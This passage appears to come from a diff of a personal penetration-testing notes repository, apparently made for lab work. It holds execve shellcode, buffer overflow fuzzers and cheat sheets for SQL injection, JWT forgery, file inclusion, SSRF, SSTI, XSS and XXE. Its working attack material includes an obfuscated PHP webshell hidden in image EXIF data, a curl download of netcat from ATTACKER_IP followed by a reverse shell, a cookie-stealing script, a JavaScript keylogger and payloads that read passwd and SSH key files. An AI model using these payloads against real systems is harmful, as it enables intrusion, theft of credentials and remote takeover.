"movq %rsp,%rsi; \n\t"
"mov $0x3b,%al; \n\t"
"syscall ; \n\t"
"pushq $0x1 ; \n\t"
"pop %rdi ; \n\t"
"pushq $0x3c ; \n\t"
"pop %rax ; \n\t"
"syscall ; \n\t"
);
}
*/
main() {
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
"\x58\x0f\x05";
(*(void (*)()) shellcode)();
}
2009-05-14
evil.xi4oyu

24
exploit/buffer_overflow/fuzzer.py Executable file
View File

@ -0,0 +1,24 @@
#!/usr/bin/env python
import sys, time, socket
ip = "192.168.56.102"
port = 31337
timeout = 5
prefix = ""
counter = 100
string = prefix + "A" * counter
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((ip, port))
print ('[+] Sending buffer')
#s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string + '\r\n', "latin1"))
s.recv(1024)
except:
print ("[!] The program can't be reached")
sys.exit(0)
string += counter * 'A'
time.sleep(1)

24
exploit/buffer_overflow/fuzzer2.py Normal file
View File

@ -0,0 +1,24 @@
#!/usr/bin/env python2
import sys,socket
import time
address = '192.168.56.102'
port = 9999
buffer = ['A']
counter = 100
while len(buffer) < 10:
buffer.append('A'*counter)
counter=counter+100
try:
for string in buffer:
print '[+] Sending %s bytes...' % len(string)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((address,port))
s.send(string + '\r\n')
s.recv(1024)
print '[+] Done'
except:
print '[!] Unable to connect to the application. You may have crashed it.'
sys.exit(0)
finally:
s.close()

31
exploit/buffer_overflow/fuzzer_BO.py Executable file
View File

@ -0,0 +1,31 @@
#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.161.147"
port = 9999
timeout = 5
prefix = ""
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
s.recv(1024)
s.send("User" '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
s.send(string + '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
print(f"fuzzing with {len(string)} bytes")
except:
#print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)

1
exploit/buffer_overflow/peda Submodule

@ -0,0 +1 @@
Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43

8
exploit/buffer_overflow/pwn_fuzz.py Normal file
View File

@ -0,0 +1,8 @@
import pwn
r = pwn.remote("10.10.156.228", 9999)
r.recvuntil(":")
r.send("User\r\n")
r.recvuntil(":")
r.send(b'A' * 2200)
r.recvuntil("message:")

3
exploit/python/pwntools.md Normal file
View File

@ -0,0 +1,3 @@
# Pwntools
* [Docs](https://docs.pwntools.com/en/stable/)

4
exploit/python/scapy.md Normal file
View File

@ -0,0 +1,4 @@
# Scapy
* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html)

1
exploit/samba/smbmap Submodule

@ -0,0 +1 @@
Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003

12
exploit/samba/smbmap.md Normal file
View File

@ -0,0 +1,12 @@
# smbmap
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
* `python3 -m pip install -r requirements.txt`
# Usage
* `-x` execute command on server
* `-s` enumerate share
```sh
smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
```

86
exploit/sqli/sqli.md Normal file
View File

@ -0,0 +1,86 @@
# SQL Injection
# Finding an Opportunity
* GET parameter
```sh
http://example.com/index.php?id=' or 1=1 -- -
```
* Provoke error to gain information
```sh
http://example.com/index.php?id='
```
# Usage
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
```sql
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
```
* Boolean True and False
```sql
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
```
* Blind injection // Guessing characters
```sh
http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
```
### Union based
* Check number of cols
```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
```
* Check which one is a string
```sql
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```
* Retrieve content, for cols and comment two times as an example. Or dump database
```sql
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
```
* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
## Tools
### SQLmap
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
* Use `-r` with a saved HTTP request
```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```
|Parameter|Details|
|-r|Uses the intercepted request save as a file|
|--dbms|DBMS of target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p |TESTPARAMETER|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
### Damn Small SQLi Scanner (DSSS)
* [Script](https://github.com/stamparm/DSSS.git)
```sh
python dsss.py -u "http://example.com/index.php?id="
```
### Online sqlmap
* [Link](https://suip.biz/?act=sqlmap)
## Payloads
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)

4
exploit/sudo/CVE_2019_18634.md Normal file
View File

@ -0,0 +1,4 @@
# Sudo pwnge with pwfeedback()
* Sudo version 1.7.1 to 1.8.30
* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)

1
exploit/web/beef Submodule

@ -0,0 +1 @@
Subproject commit 15af383355e87428a54251664feca7004a21e291

1
exploit/web/csrf.md Normal file
View File

@ -0,0 +1 @@
# CSRF

23
exploit/web/forced_browsing/forced_browsing.md Normal file
View File

@ -0,0 +1,23 @@
# Forced Browsing
Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note.
## Usage
## Tools
### wfuzz
* `pip install wfuzz`
```
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt
```
|Parameter|Detail|
|---------|------|
|-c|Shows the output in color|
|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with|
|--hc|Don't show certain http response codes|
|--hl|Don't show a certain amount of lines in the response|
|--hh|Don't show a certain amount of words|
|--hw|Don't show word response return val of this length|

3
exploit/web/idor/idor.md Normal file
View File

@ -0,0 +1,3 @@
# Insecure Direct Object Reference (IDOR)
Changing URL parameters.

1
exploit/web/jwt/jwt-cracker Submodule

@ -0,0 +1 @@
Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61

88
exploit/web/jwt/jwt.md Normal file
View File

@ -0,0 +1,88 @@
# JSON Web Token
## Build up
```sh
header.payload.signature
```
1. **Header**: This consists of the algorithm used and the type of the token.
```sh
{ "alg": "HS256", "typ": "JWT"}
```
2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.
3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)
## NONE Algorithm Vulnerability
* Example with `alg: NONE`, so no third part is needed.
```sh
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.
```
* Encoded headers are as follows
* `{"type": "JWT", "alg": "none"}`
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
```
* `{"typ":"JWT","alg":"NONE"}` with trailing `\n`
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
```
## Brute Force
```python
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
```
* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
|Parameter|Details|
|---------|-------|
|Token | The HS256 JWT Token|
|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")|
|max-length|Secret max length (default: 12)|
```sh
[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4
Attempts: 100000
Attempts: 200000
Attempts: 300000
SECRET FOUND: pass
Time taken (sec): 11.605
Attempts: 346830
```
## HS256 Vulnerability
It is calculated by using server `K_pub`, which may be gained via content of the server cert
### Build Up
* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values.
```sh
$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64
eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9
```
* Encoding the payload, no spaces inbetween. Cut `==` at the end.
```sh
echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64
eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ==
```
* Crafting the HMAC signature
* Convert `K_pub` file to hex
```sh
cat id_rsa.pub | xxd -p | tr -d "\\n"
```
* Sign the message to get the signature as hex value
```sh
echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey <converted_public_hex>
```
* Decode hex to binary data and reencode as base64 via python
```python
python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature_as_hexval>')).replace('=','')\")"
```
## Tools
* [JWTtool](https://github.com/ticarpi/jwt_tool.git)
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token)
* https://jwt.io

1
exploit/web/jwt/jwt_tool Submodule

@ -0,0 +1 @@
Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da

1
exploit/web/jwt_header Normal file
View File

@ -0,0 +1 @@
{"typ": "JWT", "alg": "HS256"}

19
exploit/web/local_file_inclusion.md Normal file
View File

@ -0,0 +1,19 @@
# Local File Inclusion
To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).
## Usage
* Exploit URL parameter
```
http://example.com/home?page=about.html
```
* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
```
http://example.com/home?page=../../../../etc/passwd
```
or
```
http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
```

17
exploit/web/methodology.md Normal file
View File

@ -0,0 +1,17 @@
We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on.
1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on.
* An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files.
4. Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.
Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:
* If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
* Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
* As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
* Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far.

35
exploit/web/php_image_exif.md Normal file
View File

@ -0,0 +1,35 @@
# PHP Payload in Image ExifData
* Test
```sh
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
```
* Build Payload with AV evasion
```sh
<?php
$cmd = $_GET["wreath"];
if (isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
```
* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
* Obfuscated code with escaped `$`
```sh
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
```
* Upload and execute commands with get parameter `?wreath=systeminfo`
## Uploading Reverse through Webshell
* Parameter for Webshell
```sh
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
```
* Trigger uploaded netcat
```sh
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
```

9
exploit/web/re_registration.md Normal file
View File

@ -0,0 +1,9 @@
# Re-registration
Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.
# Usage
* Re-register. The name is taken, that's the point, but alter the string
```
try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.
```

87
exploit/web/remote_file_inclusion.txt Normal file
View File

@ -0,0 +1,87 @@
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

17
exploit/web/ssrf/check_ssrf.py Normal file
View File

@ -0,0 +1,17 @@
#!/usr/bin/env python
import requests
s = requests.Session()
t = []
j = 0
for i in range(1, 65536):
r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}")
print(r.text)
if "Target is not reachable!" in r.text:
print(f"{i} is reachable, sum is {j}")
t.append(f"Port {i}, {r.text}")
else:
print (f"{i} not reachable")
print(t)

8
exploit/web/ssrf/curl.sh Normal file
View File

@ -0,0 +1,8 @@
#!/usr/bin/env bash
for x in {1..65535};
do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \
-w '%{size_download}');
if [ $cmd != 1045 ]; then
echo "Open port: $x"
fi
done

31
exploit/web/ssrf/ip2dh.py Normal file
View File

@ -0,0 +1,31 @@
"""
u can run this in the following format:
For decimal: python3 ip2dh.py D <Ip-address>
For Hexadecimal: python3 ip2dh.py H <Ip-address>
"""
#!/usr/bin/python3
import sys
if len(sys.argv) < 3:
print('\nYou must give desired format and IPv4 address as input...')
print('e.g.: D 192.168.10.100')
print('Valid formats D=Decimal H=Hexadecimal\n')
sys.exit(1)
Format = sys.argv[1]
def long(ip):
IP = ip.split('.')
IP = list(map(int, IP))
LongIP = IP[0]*2**24 + IP[1]*2**16 + IP[2]*2**8 + IP[3]
return LongIP
ip = long(sys.argv[2])
if Format == 'D':
print('\nIP as Decimal format: %s' % (ip))
if Format == 'H':
print('\nIP as Hexadecimal format: %s' % (hex(ip)))

26
exploit/web/ssrf/ssrf.md Normal file
View File

@ -0,0 +1,26 @@
# Server Side Request Forgery (SSRF)
is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.
## Usage
### Sanity Test Service
Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
```
http://127.0.0.1:3306
http://localhost:5432
http://0.0.0.0:53
```
* IPv6
```
http://[::]:3306
http://:::3006
```
* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)
### Reading files
```
file:///etc/passwd
```
### Tools
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)

59
exploit/web/ssti/ssti.md Normal file
View File

@ -0,0 +1,59 @@
# Server Side Template Injection (SSTI)
Pass in parameters to control the template.
## Usage
* Sanity test
```python
{{2+2}}
```
* Flask template LFI
```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
```
* Executing commands
```sh
{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
```
* RCE on server
```python
{{config.__class__.__init__.__globals__['os'].popen(<command>).read()}}
```
## Identification of Template Engine
Identify via payload checking
* Smarty: `a{*comment*}b`
* Mako: `${"z".join("ab")}`
* Twig or Jinja2
```sh
{{7*7}}
{{7*'7'}}
```
## Tools
### TPlmap
```sh
git clone https://github.com/epinna/tplmap.git
pip2 install -r requirements
```
|HTTP Method|Parameter|
|-----------|---------|
|GET|`tplmap -u <url>/?<vulnparam>`|
|POST|`tplmap -u <url> -d '<vulnparam>'`|
* Using remote command
```
tplmap -u http://<ip>:<port>/ -d '<vulnparam>' --os-cmd "cat /etc/passwd"
```
### Countermeasure
* Remove everything in user input but alnum. Passing data, not data to f-string.
```python
input = re.sub("[^A-Za-z0-9]", "", input)
template = "User input is {{ input }}"
return render_template_string(template, input=input)
```

1
exploit/web/ssti/tplmap Submodule

@ -0,0 +1 @@
Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98

3
exploit/web/url_forgery.md Normal file
View File

@ -0,0 +1,3 @@
# URL Forgery
* Just change parts of the URL

106
exploit/web/xss.md Normal file
View File

@ -0,0 +1,106 @@
# Cross-Site Scripting
A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.
## Stored XSS
This is where a malicious string originates from the websites database.
### Examples
* Sanity test by changing DOM content
```
<script>document.getElementById('myIdName').innerHTML="napf"</script>
```
* Cookie stealing
```
<script>document.location='/log/'+document.cookie</script>
```
* Navigte to `/logs` and take sid
## Reflected XSS
In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
### Usage
As script inside parameter
```sh
http://example.com/search?keyword=<script>...</script>
```
* Show server IP
```
http://example.com/reflected?keyword=<script>alert(window.location.hostname)</script>
```
## DOM based XSS
With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
```javascript
var keyword = document.querySelector('#search')
keyword.innerHTML = <script>...</script>
```
### Usage
* Find the sub-object inside the document
```javascript
test" onmouseover="alert('YO!')"
```
* Show cookie
```
test" onmouseover="alert(document.cookie)"
```
## Bypass Filters
* `<script>` sanitizing
```HTML
<img src=x onerror=alert('Hello');>
```
or
```javascript
<</script>script>alert("1")<</script>/script>
```
* `alert()` sanitizing
```javascript
0\"autofocus/onfocus=alert(1)--><onerror=prompt(2)>"-confirm(3)-"
```
or
```javascript
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
```
* Strings, here its `Hello`
```javascript
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
```
## Portscanner via Javascript
* By requesting the favicon, checking port 80
```javascript
<script>
for (let i = 0; i < 256; i++) {
let ip = '192.168.0.' + i
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
document.body.innerHTML += code
}
</script>
```
* [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
## Keylogger
```javascript
<script type="text/javascript">
let l = ""; // Variable to store key-strokes in
document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable
console.log(l); // update this line to post to your own server
}
</script>
```
## Protection Methods
There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.
1. Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;

78
exploit/web/xxe/xml_external_entity.md Normal file
View File

@ -0,0 +1,78 @@
# XML External Entity (XXE)
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
## Document Type Definition (DTD)
A DTD defines the structure and the legal elements and attributes of an XML document.
* Example file content of `note.dtd`
```
<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>
```
* !DOCTYPE note - Defines a root element of the document named note
* !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
* !ELEMENT to - Defines the `to` element to be of type "#PCDATA"
* !ELEMENT from - Defines the `from` element to be of type "#PCDATA"
* !ELEMENT heading - Defines the `heading` element to be of type "#PCDATA"
* !ELEMENT body - Defines the `body` element to be of type "#PCDATA"
NOTE: #PCDATA means parseable character data.
* Resulting XML doc follows
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>falcon</to>
<from>feast</from>
<heading>hacking</heading>
<body>XXE attack</body>
</note>
```
## Replacing XML content
* Name in the example
```xml
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
```
* System call inside entity
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root>
<name>sdafsa</name>
<tel>789731421</tel>
<email>&xxe;</email>
<password>12345</password>
</root>
```
```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
```
* PHP expect using syscalls
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<root>
<email>&xxe;</email>
<password>12345</password>
</root>
```
## Tools
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe)

13
exploit/wildard_exploitation.md Normal file
View File

